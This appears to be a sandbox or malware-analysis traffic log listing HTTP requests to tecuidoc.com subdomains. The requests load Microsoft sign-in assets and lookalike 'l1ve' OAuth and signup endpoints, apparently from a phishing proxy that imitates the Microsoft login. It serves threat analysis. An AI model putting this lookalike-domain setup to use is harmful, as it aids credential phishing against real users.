          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_eb638da25d4055fbbb57.js HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1Host: srmcorp.tecuidoc.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://srmcorp.tecuidoc.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0Sec-WebSocket-Key: +A0DlZu3oDiAnwOzoIJGYQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1Host: srmcorp.tecuidoc.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://srmcorp.tecuidoc.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0Sec-WebSocket-Key: MZ7EZBIZvf5QbUMs1CD57w==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_presetpasswordsplitter_3c78f555810791db83a9.js HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /oauth20_authorize.srf?scope=openid+profile+email+offline_access&response_type=code&client_id=51483342-085c-4d86-bf88-cf50c7252078&response_mode=form_post&redirect_uri=https%3a%2f%2fsrmcorp.tecuidoc.com%2fcommon%2ffederation%2foauth2msa&state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuAS-2C5ti-584NIeJumk-uG95ixGzviczDKwylWMyoSN07_AyPiCkfEWk6B_UbpnSnixW2pKalFiSWZ-3gUWgVcsPAbMVhwcXAIMEgwKDD9YGBexAm3VWO3s1Lcnw31_0fR5LYUijKdY9bMyUtxSLVJcS1Mz3V1TAnP1i1MrUqPcIgPTi6tSMyIqDSL0XXzdQzySfIptDa0MJ7AJTWBjOsXG8IGNsYOdYRY7wwFOxg08jAd4GX7wtW_9OXXigZnvPF7x6wSUhie6VVRFuYdblhXkm-Z5umtHOZunBQWVuZhUpOlHhUQ5O3qmOGa7p-XbbhBgAAA1&estsfed=1&uaid=86a53df4895b44e08756194225f0ef29&signup=1&lw=1&fl=easi2&fci=https%3a%2f%2f0a413710-7d4f53f3.tecuidoc.com.orgid.com HTTP/1.1Host: l1ve.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /signup?sru=https://l1ve.tecuidoc.com/oauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https://2a9e5726-7d4f53f3.tecuidoc.com HTTP/1.1Host: signup.tecuidoc.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1Host: srmcorp.tecuidoc.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://srmcorp.tecuidoc.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0Sec-WebSocket-Key: s3r5w7f19HO0reHSwJLptQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          Source: global trafficHTTP traffic detected: GET /login.srf?wa=wsignin1.0&rpsnv=150&checkda=1&ct=1714143430&rver=7.5.2156.0&wp=MBI_SSL&wreply=https%3A%2F%2Fsignup.tecuidoc.com%2Fsignup%3Fsru%3Dhttps%253a%252f%252fl1ve.tecuidoc.com%252foauth20_authorize.srf%253flc%253d1033%2526client_id%253d51483342-085c-4d86-bf88-cf50c7252078%2526mkt%253dEN-US%2526opid%253dB6E95959DB8DBA86%2526opidt%253d1714143427%2526uaid%253d86a53df4895b44e08756194225f0ef29%2526contextid%253d5ABD0222F1D086D5%2526opignore%253d1%26mkt%3DEN-US%26uiflavor%3Dweb%26lw%3D1%26fl%3Deasi2%26client_id%3D51483342-085c-4d86-bf88-cf50c7252078%26uaid%3D86a53df4895b44e08756194225f0ef29%26suc%3Dhttps%253a%252f%252f0a413710-7d4f53f3.tecuidoc.com.orgid.com%26lic%3D1&lc=1033&id=68692&mkt=en-US&uaid=86a53df4895b44e08756194225f0ef29 HTTP/1.1Host: l1ve.tecuidoc.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1 HTTP/1.1Host: signup.tecuidoc.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1Host: srmcorp.tecuidoc.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://srmcorp.tecuidoc.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0Sec-WebSocket-Key: MU9yAcvJs3G599TU8wdU4g==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          Source: global trafficHTTP traffic detected: GET /converged_ux_v2_nBE5FSqn9KpH44ZlTc3VqQ2.css?v=1 HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://signup.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1 HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://signup.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /knockout_3.3.0_X1BYS2jZMbi7hfUj8VuqFA2.js?v=1 HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://signup.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /lwsignupstringscountrybirthdate_en-us_gdxUIqa3ijrOefuBnwhTKg2.js?v=1 HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://signup.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /lightweightsignuppackage_9itStK--DdHYjkMJSN7X3A2.js?v=1 HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://signup.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1Host: srmcorp.tecuidoc.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://srmcorp.tecuidoc.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0Sec-WebSocket-Key: MirpUHeMHjg0iEGeSAnsUQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          Source: global trafficHTTP traffic detected: GET /images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2.js?v=1 HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://signup.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://signup.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svg HTTP/1.1Host: bd6a002d-7d4f53f3.tecuidoc.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
